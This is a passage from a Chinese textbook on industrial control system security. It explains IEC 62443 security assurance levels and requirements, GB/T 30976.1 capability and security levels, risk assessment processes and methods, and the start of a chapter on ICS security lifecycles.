系列标准,信息安全生命周期的不同阶段使用了不同的 SAL。例如, 对于具体的工业控制系统要实现其信息安全程序,开始先设定目标 SAL, 然后组织需要 设定的目标 SAL, 完成设计和实现过程。换言之,设计小组首先根据设计的目标 SAL 进 入特定系统的开发阶段,然后设计系统实现设计的目标 SAL 。在设计过程中,设计人员 会根据设计的目标 SAL 确定所选的系统和组件,根据系统和组件的能力 SAL 进行评估和 验证,以确定其能力 SAL 是否满足设计的目标 SAL 的要求。在系统进行运行阶段,通过 评估和验证,以确认达到 SAL 是否满足系统能够使用的实际 SAL, 并将达到 SAL 与目标 SAL 进行比较,最终确定系统的达到 SAL。 由目标 SAL 开始,根据能力 SAL 到最终达到 SAL, 是一个反复评估验证并曲折变化 的实现过程。首先,在设计过程中,系统中的构件或设备可能不能满足系统能力要求,要 不断进行调整,要么调整新的设备,要么在原来设备的基础上增加额外的保护措施。新增 加设计的抗风险能力及系统的漏洞是否被正确识别,需要对系统不断评估,而原来在用的 工业控制系统的不完善加上新的风险也在不断变化中,因此,对于控制系统来说,实现系 统信息安全防范绝对是非常严峻的挑战。 IEC 624433-3 是该系列标准第三类的第三部分,描述了7个基本(安全)需求:标识 与鉴别控制(IAC); 用户控制 (UC); 数据完整性 (DI); 数据保密性 (DC); 受限制的数 据流 (RDF); 事件实时响应 (TRE); 资源可用性 (RA) 。 该部分还描述了系统的4个安全 保障等级,具体如下所述。 SAL1: 抵御某些具有偶然性或巧合性的威胁攻击。 对系统或组件偶然或巧合性的威胁攻击,其产生的主要原因是,不像内部其他规章制 度(如安全生产等)制定得那么详细周全,组织内部缺少信息安全规程的制定,因而执行 起来比较松散。这就使得外部入侵者能够像企业内部员工那样轻易地进入系统实施威胁。 这类入侵事件能够通过制定信息安全规程和程序来防范。 SAL2: 抵御简单的故意性威胁攻击。该威胁攻击具有通用方法,使用低资源并具有 低动因特点。 简单的方法是指对攻击者来说,他们并不需要太多的知识就能够达到目的。攻击者在 实施攻击时,并不需要太专业的知识。例如,信息安全、区域或被攻击系统等也能执行攻 击行为。网上有很多免费攻击软件,甚至有很多自动攻击工具能够自动攻击大范围的系统 而不仅仅针对某一特定系统。 SAL3: 抵御复杂的故意性威胁攻击。该威胁攻击采用系统性特定的方法,使用中等 资源并具有中动因的特点。 复杂方法需要更多的信息安全知识、工业控制系统的专业知识,以及非常了解要攻击 的系统。对于这类方法比较典型的例子是基于哈希表的密码或密钥破解工具。这类工具可 以在网上免费获得,但是使用这些工具需要系统知识(如哈希密码破解)。例如,攻击者 通过以太网控制器的漏洞,访问控制 PLC, 然后通过Modbus 管道就可以访问安全仪表系 统 (SIS)。 SAL4: 抵御复杂的故意性威胁攻击。该威胁攻击采用系统性特定的方法,使用扩展 性资源并具有高动因的特点。 使用复杂的方法去违反系统的信息安全要求,攻击者要使用更多资源才能达到目的。 这可能包括高性能的计算资源、大型计算机或更长的时间周期,甚至有些情况下要制造相 关的系统模型。 使用复杂的方法还要借助更多资源,比较常见的方法是使用巨型计算机或计算机群、 超大哈希表,通过强力攻击破解密码;还有僵尸网络,即同时使用多个攻击软件来攻击系 统。这类攻击者往往是有目的的犯罪组织,通过花费大量时间分析攻击目标,并且开发自 制软件,借助高技术工具来达到目的。 4.3.2 安全保障等级与安全完整性等级的区别 IEC 62443中引入了信息安全保障等级 (Security Assurance Level,SAL)的概念,尝 试用一种定量的方法处理一个区域的信息安全事务。通过定义并比较用于信息安全生命周 期不同阶段的目标 SAL、 完成 SAL 和能力 SAL, 实现预期设计结果的安全性。它从身份 和授权控制、使用控制、数据完整性、数据保密性、受限数据流、事件适时响应、资源可 用性7个基本要求入手,将信息安全保障等级分为4级。 功能安全系统使用安全完整性等级 (Safety Integrity Level,SIL)的概念已有近20年, 它允许一个部件或系统的安全表示为单个数字,而这个数字是为了保障人员健康、生产安 全和环境安全而提出的基于该部件或系统失效率的保护因子。工业控制系统信息安全的评 估方法与功能安全的评估有所不同。虽然都是保障人员健康、生产安全或环境安全,但是 功能安全使用安全完整性等级 (SIL) 是基于随机硬件失效的一个部件或系统失效的可能性 计算得出的,而信息安全系统有着更广泛的应用,以及更多可能的诱因和后果。影响信息 安全的因素非常复杂,很难用一个简单的数字描述出来。然而,功能安全的全生命周期安 全理念同样适用于信息安全,信息安全的管理和维护也必须是周而复始不断进行的。 4.3.3 基本要求 SAL 等级的确定基于工业控制系统在系统能力方面需要满足的7个基本要求。这7个 基本要求 (FR) 包括如下方面。 1.FR1: 标识和认证控制 识别和鉴别所有用户(人员、过程和设备),并且允许他们访问系统或资产,其目的 是保护对设备和/或其信息查询的未授权访问。SAL 的描述如下。 SAL1 通过机制识别和鉴别所有用户(人员、过程和设备),以防止入侵者未经授 权偶然或碰巧对系统或资产进行访问。 SAL2 通过机制识别和鉴别所有用户(人员、过程和设备),以防止入侵者使用简 单的方法故意未经授权对系统或资产进行访问。 SAL3 -通过机制识别和鉴别所有用户(人员、过程和设备),以防止入侵者使用复 杂的方法故意未经授权偶然或碰巧对系统或资产进行访问。 2.FR2: 使用控制 授权用户(人员、过程和设备)根据分配的优先级执行对系统或资产的访问,其目的 是保护对设备的未授权操作。SAL 的描述如下。 SAL1—— 根据规定的级别限制使用系统或资产,以防止偶然或碰巧误用。 SAL2 根据规定的级别限制使用系统或资产,以避免实体使用简单的方法对系统 或资产进行访问。 SAL3—— 根据规定的级别限制使用系统或资产,以避免实体使用复杂的方法对系统 或资产进行访问。 SAL4——根据规定的级别限制使用系统或资产,以避免实体使用复杂的方法且利用 更多的资源对系统或资产进行访问。 3.FR3: 系统完整性 确保信道和数据库的信息完整性,其目的是防止篡改数据。SAL 的描述如下。 SAL1——保护系统的信息完整性,以防止偶然或碰巧篡改。 SAL2——保护系统的信息完整性,以防止入侵者使用简单的方法篡改。 SAL3——保护系统的信息完整性,以防止入侵者使用复杂的方法篡改。 SAL4 保护系统的信息完整性,以防止入侵者使用复杂的方法且利用很多资源 篡改。 4.FR4: 数据保密性 确保信息和数据库数据的保密性,其目的是防止数据泄露。SAL 的描述如下。 SAL1 通过窃听或偶然披露散布信息。 SAL2—— 入侵者主动通过简单的方法散布信息。 SAL3—— 入侵者主动通过复杂的方法散布信息。 SAL4—— 入侵者主动通过复杂的方法且利用更多资源散布信息。 5.FR5: 限制的数据流 利用区域和管道将系统分段,以限制不必要的数据流在区域间传输,其目的是保护信 息。SAL 的描述如下。 SAL1—— 防止对区域和管道分段系统的偶然或碰巧绕行。 SAL2—— 防止入侵者使用简单的方法对区域和管道分段系统故意绕行。 SAL3—— 防止入侵者使用复杂的方法对区域和管道分段系统故意绕行。 SAL4—— 防止入侵者使用复杂的方法且利用更多资源对区域和管道分段系统故意 绕行。 6.FR6: 对事件的及时响应 直接向权威机构响应发生的信息安全事件,提供确凿证据,并且在原因确定后能够及 时采取正确行为,其目的是将信息安全的侵害通知权威部门,并报告相关证据。SAL 的 描述如下。 SAL1 监控系统的运行,并且需要及时提供确凿证据对发现的事件做出响应。 SAL2—— 监控系统的运行,并且系统能够主动搜集确凿证据对发现的事件做出响应。 SAL3 监控系统的运行,并且将搜集到的证据提交到权威部门对发现的事件做出 响应。 SAL4—— 监控系统的运行,并且将搜集到的证据实时地提交到权威部门响应发现的 事件。 7.FR7: 资源可用性 确保系统或资产的可用性,其目的是保护整个网络资源以免遭受拒绝服务 (DoS) 攻 击。SAL 的描述如下。 SAL1——确保生产过程中系统正常运行,并且防止入侵者因偶然或碰巧行为造成服 务拒绝。 SAL2——确保生产过程中系统正常运行,并且防止入侵者通过简单方式造成服务 拒绝。 SAL3—— 确保生产过程中系统正常运行,并且防止入侵者通过复杂方式造成服务 拒绝。 SAL4 -确保生产过程中系统正常运行,并且防止入侵者通过复杂方式且使用更多 资源造成服务拒绝。 4.3.4 系统要求 4.3.3 节介绍的7 项基本要求 (FR) 可以扩展为一系列的系统要求 (SR) 。 每个系统要求 (SR) 都有一个基准要求且没有或有多个要求增强项,以加强信息安全。每个基准 要求和要求增强项均对应系统能力等级 (SL-C), 详细内容可查阅相关规范。下面简单列 出7项基本要求 (FR) 及其系统要求 (SR)。 1.FR1: 标识和认证控制系统要求 SR1.1: 用户标识和认证。 SR1.2: 软件过程和设备标识及认证。 SR1.3: 账户管理。 SR1.4: 标识符管理。 SR1.5: 认证符管理。 SR1.6: 无线访问管理。 SR1.7: 基于密码认证长处。 SR1.8: 公钥基础结构证书。 SR1.9: 公钥认证长处。 SR1.10: 认证符反馈。 SR1.11: 不成功登录企图。 SR1.12: 系统使用通知。 SR1.13: 不受信任的网络访问。 2.FR2: 使用控制系统要求 SR2.1: 授权的执行。 SR2.2: 无线使用控制。 SR2.3: 对便携和移动设备的使用控制。 SR2.4: 移动代码。 SR2.5: 会话锁。 SR2.6: 远程会话终止。 SR2.7: 并发会话控制。 SR2.8: 可审计的事件。 SR2.9: 审计存储容量。 SR2.10: 审计处理失败的响应。 SR2.11: 时间戳。 SR2.12: 不可否认性。 3.FR3: 系统完整性系统要求 SR3.1: 通信完整性。 SR3.2: 恶意代码保护。 SR3.3: 安全功能验证。 SR3.4: 软件和信息完整性。 SR3.5: 输入验证。 SR3.6: 确定性的输出。 SR3.7: 错误处理。 SR3.8: 会话完整性。 SR3.9: 审计信息的保护。 4.FR4: 数据保密性系统要求 SR4.1: 信息机密性。 SR4.2: 信息存留。 SR4.3: 密码的使用。 5.FR5: 限制的数据流系统要求 SR5.1: 网络分区。 SR5.2: 区域边界防护。 SR5.3: 一般目的的个人通信限制。 SR5.4: 应用分离。 6.FR6: 对事件的及时响应系统要求 SR6.1: 审计日志的可访问性。 SR6.2: 持续监视。 7.FR7: 资源可用性系统要求 SR7.1: 拒绝服务的防护。 SR7.2: 资源管理。 SR7.3: 控制系统备份。 SR7.4: 控制系统恢复和重构。 SR7.5: 紧急电源。 SR7.6: 网络和安全配置设置。 SR7.7: 最小功能化。 SR7.8: 控制系统元器件清单。 4.3.5 系统能力等级 国际上针对工业控制系统的信息安全评估和认证还处于起步阶段,尚无统一的评估规 范。IEC 62443 第2-4部分涉及信息安全的认证问题,但由于 IEC 国际标准组织规定,其 实现的标准文件中不能有认证类词汇,因此,工作组决定将该部分标准名称改为“工业控 第4章 工业控制系统信息安全风险评估 制系统制造商信息安全基本实践”。然而,真正可用于工业控制系统信息安全评估的规范 仍然空白。 由全国工业过程测量、控制标准化技术委员会 (SAC/TC124) 和全国信息安全标准化 技术委员会 (SAC/TC260) 牵头,参考IEC 62443 制定的我国工业控制系统信息安全评估 规范标准《GB/T 30976.1—2014: 工控系统信息安全》中的“第1 部分:评估规范”于 2015年2月1 日起实施。该标准规定了工业控制系统(SCADA 、DCS 、SLC 、PCS 等) 信息安全评估的目标、内容、实施过程等,适用于系统设计方、设备生产商、系统集成 商、工程公司、用户、资产所有人,以及评估认证机构等对工业控制系统的信息安全进行 评估。 在该标准中将评估分为管理评估和51 项系统能力(技术)评估。其中,系统能力 (技术)评估分为4个级别,由小到大分别对应系统能力等级 (Capability Level,CL) 的 CL1 、CL2 、CL3 和 CL4, 该方案实现的主要技术指标将以系统能力(技术)评估结 果展现。 系统能力等级的说明如下。 能力等级 CL1: 提供机制保护控制系统防范偶然、轻度攻击。 能力等级 CL2: 提供机制保护控制系统防范有意、利用较少资源和一般技术的简单手 段可能达到较小破坏后果的攻击。 能力等级 CL3: 提供机制保护控制系统防范恶意、利用中等资源、ICS 特殊技术的复 杂手段可能达到较大破坏后果的攻击。 能力等级 CL4: 提供机制保护控制系统防范恶意、使用扩展资源、ICS 特殊技术的复 杂手段与工具可能达到重大破坏后果的攻击。 4.3.6 信息安全等级 1. 管理等级划分 根据信息安全控制实用规则 (ISO 27002) 的管理要求和过程自动化用户协会(WIB) 的推荐要求,通过管理评估,将管理等级划分为3级,分别为ML1 、ML2 和 ML3, 由低 到高分别对应低级、中级和高级。 2. 系统能力等级划分 根据4.3.5节的内容,基于IEC 62443-3-3 技术要求,通过系统能力(技术)评估,将 系统能力等级分为4级,由低到高分别对应系统能力等级的CL1 、CL2 、CL3 和 CL4。 3. 信息安全等级 (SL) 的划分 根据管理评估和系统能力评估的结果,可以得到工业控制系统的评估结果,即信息安 全等级,划分为4级,由低到高分别对应SL1 、SL2 、SL3和 SL4, 如表4-1 所示。 表4-1 信息安全等级表 管理等级 系统能力等级 CL1 CL2 CL3 CL4 ML1 SL1 SL1 SL1 SL1 ML2 SL1 SL2 SL2 SL3 ML3 SL1 SL2 SL3 SL4 4.4 风险评估过程 针对区域和管道风险评估,必须结合公司风险管理策略(如环境健康安全方针),采 取有效的评估流程。详细风险评估流程图如图4-9 所示。这个流程包括四步:准备评估、 开展评估、沟通评估和维持评估。 图4-9 详细风险评估流程图 对于工业控制系统的每个区域或管道都需要执行以下活动。对于类似资产的相同威 胁,可以合并考虑和分析。 4.4.1 准备评估 1. 目 标 准备评估的目标是为风险评估建立背景。 2. 关键活动 准备评估的关键活动包括以下几点: (1)识别风险评估的目的。 (2)识别风险评估的范围。 (3)识别进行哪种风险评估的假设和约束条件。 (4)识别风险评估中用到的威胁、漏洞和冲击信息源。 (5)明确和改进风险评估中用到的风险模型、评估方法和分析方法。 4.4.2 开展评估 1. 目标 开展评估的目标是制定一个信息安全风险清单。此清单中的信息安全风险按风险等级 排出优先级,并且可用于通知风险响应决策。 2. 关键活动 开展评估的关键活动包括识别威胁源和事件、识别漏洞和诱发条件、确定发生的可能 性、确定冲击的幅度及确定风险。 1)识别威胁源和事件 识别威胁源和事件,可进一步分为以下几点: (1)识别威胁源和事件输入。 (2)识别威胁源和事件。 (3)确定这些威胁源和事件是否与公司组织相关且在范围内。 (4)创建和更新威胁源和事件评估。 (5)识别相关敌对的威胁源和事件(评估敌对的能力、意图和目标)。 (6)识别相关非敌对的威胁源和事件(评估威胁源影响的范围)。 2)识别漏洞和诱发条件 识别漏洞和诱发条件,可进一步分为以下几点: (1)识别漏洞和诱发条件输入。 (2)使用公司组织定义的信息源识别漏洞,创建并更新一个清单。 (3)识别诱发条件。 (4)估计诱发条件的普遍蔓延。 3)确定发生的可能性 确定发生的可能性,可进一步分为以下几点: (1)识别可能性测定输入。 (2)使用公司组织定义的信息源识别可能性测定因素。 (3)估计威胁事件引发敌对威胁的可能性和威胁事件引发非敌对威胁的可能性。 (4)按触发或发生的可能性,估计导致敌对冲击威胁事件的可能性。 (5)估计威胁事件触发/发生的整个可能性和导致敌对冲击威胁事件的可能性。 4)确定冲击的幅度 确定冲击的幅度,可进一步分为以下几点: (1)识别冲击测定输入。 (2)使用公司组织定义的信息源识别冲击测定因素。 (3)识别敌对冲击和受影响的资产。 (4)估计受影响资产相关的最大冲击。 5)确定风险 确定风险,可进一步分为以下几点: (1)识别不确定性测定和风险的输入。 (2)确定风险。 4.4.3 沟通结果 1. 目标 沟通结果的目标是确保公司组织的决策者有正确的、与风险相关的信息,以便发出通 知和指导风险决策。 2. 关键活动 沟通结果的关键活动包括以下几点: (1)明确正确的方法。 (2)与指定的公司股东沟通风险评估结果。 (3)共享风险评估结果,与公司的方针和指导一致。 4.4.4 维护评估 1. 目标 完成风险评估、沟通评估结果后,风险评估过程并没有结束,因为网络威胁和系统漏 洞也在不断演变,公司应该不断考虑它们的风险姿态,以维持可接受的残余风险等级。 2. 关键活动 维护评估的关键活动包括以下几点: (1)识别已发现的、还需不断监控的关键风险因素。 (2)识别风险因素监控活动的频率和事项,找出哪些风险评估需要更新。 (3)重新确认风险评估的目的、范围和假设。 (4)实施正确的风险评估任务。 (5)与公司有关人员沟通后续的风险评估。 4.5 风险评估方法 风险评估方法主要有定性和定量风险评估方法、基于场景和资产风险评估方法、详细 风险评估方法和高层次风险评估方法。 许多风险评估方法在市场上能够获得,其中有些风险评估方法是免费的,而有些风险 评估方法在使用时需要验证。对这些风险评估方法进行评估,从而选取最有用的风险评估 方法,是一件困难的事情。许多风险评估方法有一个共同的前提,即风险是事件发生与后 果的可能性组合。对于一个特定的控制系统网络事故,设置适当的概率值并不是件容易的 事,不仅因为历史数据缺乏,还因为一旦一个弱点暴露,历史数据并不能预测将来可能发 生的事情。因此,许多公司和商业联盟针对自身特点开发出一些风险评估方法,以解决对 公司重要问题的威胁和脆弱性。 有些方法充分支持高层次风险评估,而有些方法充分支持详细风险评估,以及支持基 于场景和资产的风险评估等。这些方法允许输入易损性评估结果,也能够直接为相应的详 细易损性评估提供指导。如果一种方法能够同时支持高层次和详细风险评估,那么这种方 法对一个组织机构而言是非常有效的。因此,要确定某种风险评估方法一般需要进行筛 选、选择、验证和确定4个步骤。 4.5.1 定性和定量风险评估方法 定性风险评估方法可依赖有经验的雇员或专家的意见,提供关于特定风险影响特定资 产的可能性和严重性的信息。此外,不同层次的可能性和严重性可以通过一般级别,如 高、中、低来识别,而不是特定的可能结果和经济影响。 在缺乏可靠信息时,定性风险评估方法不适用,改用定量风险评估方法更加适用,这 些信息为特定风险对特定资产影响的可能性,或者特定资产损害带来影响的整体评估。 定量风险评估方法需要大量的数据支持,这些数据可以提供因风险和脆弱性带来损失 的概率。如果这些信息可用,那么定量风险评估能够提供比定性风险评估更加精确的风险 评估结果。根据最近提供的有关工业控制系统安全威胁的数据,事故发生及威胁迅速激化 的现象相对较少发生,在这种情形下,定量风险评估方法在评价这些风险中更有效。 4.5.2 基于场景和资产的风险评估方法 基于场景和资产的风险评估方法是利用实际的或近乎实际的事故进行评估,如工业控 制系统的装备在本地或远程未授权访问操作会带来什么结果、工业控制系统的数据被窃或 被损害会带来什么后果等。 基于场景和资产的风险评估方法适用于组织机构对控制系统、工作方法和经济产生影 响的特定资产有一定的认识。 基于场景和资产的风险评估方法不能深入发现风险对敏感资产的威胁,这些敏感资产 之前并没有风险。由于这种方法不能发现某些威胁和漏洞,所以这些威胁和漏洞将使某些 设备置于危险中。 4.5.3 详细风险评估方法 详细风险评估方法主要集中在个体工业控制系统网络和设备上,同时要考虑具体财产上 的技术漏洞评估和现有政策的有效性,可能对于组织机构一次性工业控制系统资产执行详细 风险评估不是很切合实际。在这种情况下,组织机构将会收集足够的关于工业控制系统信 息,允许对系统做优先级排序,决定哪些信息首先由具体漏洞和风险评估做分析。 在详细风险评估方法中定义了风险,并进行优先级排序。定义风险之后,组织机构可能 会选择对所有的系统风险进行优先级排序,对各个系统的个体风险,如某个地方的所有工业控 制系统进行优先级排序。由于系统风险优先级最终驱动执行什么样的行动和投资改善计算机安 全,因此,只有优先权的范围符合预算的范畴,组织机构才能决定做这些投资。例如,如果工 业控制系统支持的特定生产线作为一个集团,则风险将通过与工业控制系统一起被优先级排 序,以保证经营管理人员的决定过程。 4.5.4 高层次风险评估方法 高层次风险评估方法阐明了运用工业控制系统产生的个别风险的性质,这需要从根本上 选择最有效的方法和分析配置的成本。高层次风险评估方法需要通过风险分析会议收集利益 关系者的意见,也需要利用高级商业后果,这些后果在经营理念中已经阐述。风险分析会议 中的文件列举了一些情景,这些情景描述了一个特定威胁怎样利用特定漏洞造成经济损失和 负面的商业影响,这种会议也设定了后果等级标准和抗风险等级优先顺序。 利益关系者在业务上使用过工业控制系统,在相关风险关系上负有责任。因此,利益 关系者需要参与风险评估,以进一步增长知识和经验。如果要使风险分析会议成功举行,参与者就必须理解风险和漏洞的概念,否则,会议 很可能只能找出漏洞而不能识别风险。例如,在控制系统 HMI 中,弱认证可能就是一个 漏洞,相应的风险可能为经验不足的雇员能够在无监管的情况下,对控制系统 HMI 进 行 操作,设置不安全参数,于是由于安全控制问题,导致生产停止。组织机构列举网络漏 洞,然后修复这些漏洞,这本身就是一个常见的缺陷。 第 5 章 工业控制系统信息安全生命周期 5.1 概 述 工业控制系统在国民经济中扮演越来越重要的作用,人们开始关注工业控制系统的可 靠性和稳定性,工业控制系统生命周期是必然受到关注的主题。同时,随着信息安全的发 展,人们也开始研究工业控制系统信息安全生命周期,为解决控制系统信息安全提供一定 的指导。 掌握工业控制系统通用生命周期,使我们了解通用生命周期各个阶段的工作有明确的 方向,同时,对我们运行和维护控制系统有很大帮助。理解工业控制系统安全生命周期, 有助于我们了解安全生命周期每个阶段的具体工作。 通过分析工业控制系统信息安全的成熟周期,我们对工业控制系统的信息安全会有进 一步认识。 本章最后分析工业控制系统信息安全等级生命周期,可使我们充分理解工业控制系统 信息安全等级。 5.2 工业控制系统生命周期 众所周知,工业控制系统是有生命周期的,这是理解工业控制系统可靠性和稳定性的 基础。 最初提出的工业控制系统生命周期是通用生命周期,有利于系统的运行和维修,而最 近又提出工业控制系统安全生命周期,可以给控制系统信息安全工作提供帮助。 5.2.1 工业控制系统通用生命周期 工业控制系统通用生命周期通常包括策划阶段、采购阶段、实施阶段、运行阶段和报 废阶段,如图5-1所示,下面分别进行介绍。 运行阶段 (变更、升级) 图5-1 工业控制系统通用生命周期图 1. 策划阶段 策划阶段是工业控制系统的第一个阶段。 工业控制系统的策划应适应生产工艺要求和现场环境要求。经过项目的规划确定控制 系统的方案,经过项目的初步设计和详细设计,控制系统的配置就可以明确确定。 2. 采购阶段 采购阶段是工业控制系统的第二个阶段。 工业控制系统的采购应根据项目详细设计提出的控制系统配置进行。通过商务和技术 确定,工业控制系统的采购已经明确。 3. 实施阶段 实施阶段是工业控制系统的第三个阶段。 工业控制系统的实施一般由控制系统供应商或集成商完成。供应商或集成商应根据项 目详细设计提出的控制系统配置和控制要求进行系统搭建和软件组态;之后,会与用户完 成功能测试与验收;最后,在现场安装测试并投入运行。 4. 运行阶段 运行阶段是工业控制系统的第四个阶段。 工业控制系统的运行应满足生产工艺要求和企业生产要求。 在工业控制系统的运行过程中,工业控制系统会面临变更和升级工作。变更是对生产 工艺的优化,可以提高控制系统的稳定性和可靠性。同时,由于供应商为适应市场发展要 求而进行产品升级,加上工控产品的质保期不一致,必然要面对控制系统的升级。 5. 报废阶段 报废阶段是工业控制系统的第五个阶段。 工业控制系统的报废一般根据工控产品的寿命来考虑。到期的工控产品必须及时报 废,更换新的工控产品,以保证控制系统的高可靠性。 5.2.2 工业控制系统安全生命周期 工业控制系统安全生命周期是一个最近兴起的概念,是针对控制系统信息安全提出的。 工业控制系统安全生命周期通常用图5-2所示的安全周期V 模型图来表述。工业控制 系统安全生命周期分为3个阶段,分别为评估阶段、验收阶段和常规运行阶段。 1. 评估阶段 评估阶段工作包括确定评估目标、制定评估计划、选择评估方法、获取必备信息、高 级风险评估、详细风险评估、综合评估结果和改进措施建议。 图5-2 工业控制系统安全生命周期V 模型图 1)确定评估目标 根据满足组织机构业务持续发展在信息安全方面的需要、法律法规的规定等内容,识 别本阶段工业控制系统及管理上的不足,以及可能造成的风险大小。 应分析组织机构资产的状况、商业理念,以及计划如何进行风险识别、分类和评估。 2)制定评估计划 用户与评估方签订评估协议书和系统评估规模,评估方组建评估项目组,从人员方面 做好准备,并编制项目计划书。 应制定时间表,确定项目如何启动,信息如何收集和分析,以及需要准备哪些内容。 项目计划书应包括项目概述、工作依据、技术思路和项目组织机构等。 3)选择评估方法 组织机构应选择一个具体的风险评估和分析方式与方法,基于控制系统资产相关的安 全威胁、漏洞和后果,对风险进行识别和优先排序。 4)获取必备信息 在识别风险之前,组织机构应为风险评估活动的参与者提供适当的信息,包括方法、 培训等。 5)高级风险评估 应进行高层次的系统风险评估来理解控制系统的可用性、完整性或机密性被破坏带来 的财务和 HSE 后果。 6)详细风险评估 组织机构需要识别各种控制系统,收集设备数据来描述风险评估的性质,并将设备归 入逻辑系统中。 第5章 工业控制系统信息安全生命周期 组织机构应为每个逻辑整合系统开发简单的网络架构,显示主要设备、网络类型和设 备的通常位置。 组织机构应为减少每个逻辑控制系统的风险制定标准并分配优先级。 组织机构应对每个逻辑控制系统执行漏洞评估,范围可以基于高级别风险评估结果和 控制系统遭受这些风险的优先级确定。 组织机构的风险评估方法应包含对详细漏洞进行优先排序的方法,详细漏洞通过详细 漏洞评估识别。 组织机构应结合详细漏洞评估中识别出来的漏洞进行详细的风险评估。 组织机构应依据技术、组织机构和工业运行的变化,识别风险和漏洞,重新评估频率 和触发标准。 7)综合评估结果 应综合物理、HSE 和网络安全风险评估结果来理解资产的整体风险。 风险评估应在技术生命周期的所有阶段进行,包括规划、设计、实施、运行维护和废 弃阶段。 8)改进措施建议 根据风险评估,提出改进措施和建议,并编写评估报告。 风险评估方法和风险评估结果应被文档化。 对所有包含工业控制系统的资产,应维护最新的漏洞评估记录。 从组织机构管理方面提出信息安全的主要问题及改进建议;从技术措施方面提出信息 安全的主要问题及改进建议。 2. 验收阶段 验收阶段工作包括整改实施计划、识别工况环境、措施风险分析、确定风险处置方 案、措施具体实施、安全措施验证和系统完整性验证。 1)整改实施计划 对评估阶段提出的改进措施提出整改实施计划。 整改实施计划应考虑工业控制系统在生产工作中的关键性和企业生产在经济方面的重 要性进行具体安排。 2)识别工况环境 用于工业现场的安全设备,应符合工业环境的相关要求。工业环境适应性要求包括气 候、电磁兼容、电气安全、机械适应性、外部电源和外壳防护要求。由于设备适用的行业 不同,可增加行业特定的要求。 3)措施风险分析 措施风险分析主要针对增加安全解决方案后可能产生的风险。风险分析阶段的关键控 制点主要有以下两点。 (1)建立的风险分析模型及确定的风险计算方法,应能正确反映用户的行业安全特点、核心业务系统所处的内、外部环境安全状况。 (2)用户确认的信息、数据及相关文档资料应及时得到准确反馈。 风险分析报告是风险分析阶段的输出文档,是对风险分析阶段工作的总结。风险分析 报告中需要对建立的风险分析模型进行说明,并需要阐明所采用的风险计算方法及风险评 价方法。报告中应对计算分析出的风险给予详细说明,主要包括风险对用户、业务及系统 的影响范围,所依据的法规和证据及风险分析结论。 4)确定风险处置方案 风险处置依据风险分析报告进行。 风险处置的基本原则是根据用户可接受的处置成本将残余安全风险控制在可以接受的 范围内。 依据国家、行业主管部门发布的信息安全建设要求进行的风险处置,应严格执行相关 规定。实施的安全风险加固工作应满足相应信息安全能力等级的安全技术和管理要求;对 于因不能够满足该等级安全要求产生的风险,不适用适度接受风险的原则。对于有着行业 主管部门特殊安全要求的风险处置工作,同样不适用该原则。 风险处置方式一般包括接受、消减、转移、规避等。在风险不适合转移或规避的情况 下,通常采用安全整改方式进行风险消减。风险分析需提出安全整改建议。 5)措施具体实施 安全整改建议需根据安全风险的严重程度、加固措施实施的难易程度、降低风险的时 间紧迫程度、所投入的人员力量及资金成本等因素综合考虑。 (1)对于非常严重、需立即降低且加固措施易于实施的安全风险,建议用户立即采取 安全整改措施。 (2)对于非常严重、需立即降低,但加固措施不便于实施的安全风险,建议用户立即 制定安全整改实施方案,尽快实施安全整改;整改前应对相关安全隐患进行严密监控,并 做好应急预案。 (3)对于比较严重、需降低且加固措施不易于实施的安全风险,建议用户制定限期实 施的整改方案;整改前应对相关安全隐患进行监控。 6)安全措施验证 安全整改措施整改完毕,应对安全措施进行验证,保证安全措施的有效性。 7)系统完整性验证 在整改措施具体实施完毕后,应对控制系统的完整性进行验证,保证各整改措施结果 正确,系统完好。 3. 常规运行阶段 常规运行阶段工作包括安全态势分析、常规分析与报告、定期审计与措施及重新评估与验收。 1)安全态势分析 控制系统在正常运行中应进行安全态势分析,如出现漏洞和功能不足等,保证系统始 终能够正常、稳定运行,并且信息安全得到保证。 2)常规分析与报告 对控制系统进行常规分析,及时发现问题,及时分析,并及时准备分析报告,以便于 后期的维护与计划。 3)定期审计与措施 开展定期的安全审计,制定有效措施,确保控制系统信息安全。 4)重新评估与验收 在控制系统正常运行过程中,如有任何变动,都必须重新评估和验收,确保控制系统 安全等级没有降低。 5.3 工业控制系统信息安全程序成熟周期 面对不断增长的网络信息安全风险,很多组织机构都采取主动应对信息技术系统和网 络的信息安全风险,同时,这些组织机构开始认识到网络信息安全是一项连续的活动或过 程,而不是一个能识别开始与结束的项目。 开放信息技术已在工业控制系统中大量采用,需要更多的知识来安全部署这些技术。 公司 IT 人员和生产人员必须共同协作,解决信息安全问题。同时,工业生产又具有潜在 的健康、安全和环境 (HSE) 事件,因此,工艺安全管理人员和物理安全人员也应加入这 项工作中。 成熟的信息安全程序的目的是集中信息安全的各个方面,即将办公桌面和商业计算系 统也考虑在工业控制系统中。许多组织机构在商业计算系统有相当详细和完善的网络安全 程序,但是在工业控制系统方面却没有开放信息安全管理程序。 普遍存在的错误观点是把信息安全作为一个有开始和结束日期的项目来处理。如果是 这样,那么随着时间的推移,其信息安全等级通常会降低。新的威胁和漏洞随着技术的不 断改变而出现,网络信息安全风险也在不断发生变化。我们可以考虑采取不同的方法来维 持信息安全等级,将风险控制在一个可以接受的水平。 基于组织机构的目标和风险可接受程度,每个组织机构实施信息安全管理系统的途径 将有所不同。信息安全加入组织机构的标准化实践是一种文化的改变,这需要花费一定的 时间和资源,不可一蹴而就。实现信息安全标准化是一个渐进的过程。信息安全实践的实 施必须与风险等级成比例,每个组织机构的做法可以不同,甚至与一个组织机构的不同运 作部门也不相同。在同一个组织机构内,每个系统的风险等级和信息安全要求不一致,因 此不同的信息安全方针和程序也会有所不同。总之,信息安全管理系统的建立应考虑这些 不同之处。 5.3.1 概述 工业控制系统信息安全程序成熟周期可以通过一个生命周期来描述,称为工业控制系 统信息安全程序成熟生命周期。 一般地,工业控制系统信息安全程序成熟生命周期由多个阶段组成,而每个阶段又可 以由一步或几步组成,如图5-3所示。 图5- 3 工业控制系统信息安全成熟生命周期图 工业控制系统的各个部分及一个控制系统的各个控制区域可以在成熟周期的不同阶 段。造成这种情况的原因有多个,包括预算有限制、漏洞与威胁评估、更换或取消计划、 风险分析结果的搁置安排、自动化系统升级、出售部分商业资产、信息安全系统升级至更 成熟阶段的资源受限等。 通过评定工业控制系统各个阶段和步骤的完成程度,组织机构可以获得更加详细的信 息安全成熟周期的评估。 5.3.2 各阶段分析 如图5-3 所示,工业控制系统信息安全程序成熟生命周期由5个阶段组成,包括初步 设计阶段、功能分析阶段、实施阶段、运行阶段和循环与处置阶段。下面对各个阶段进行 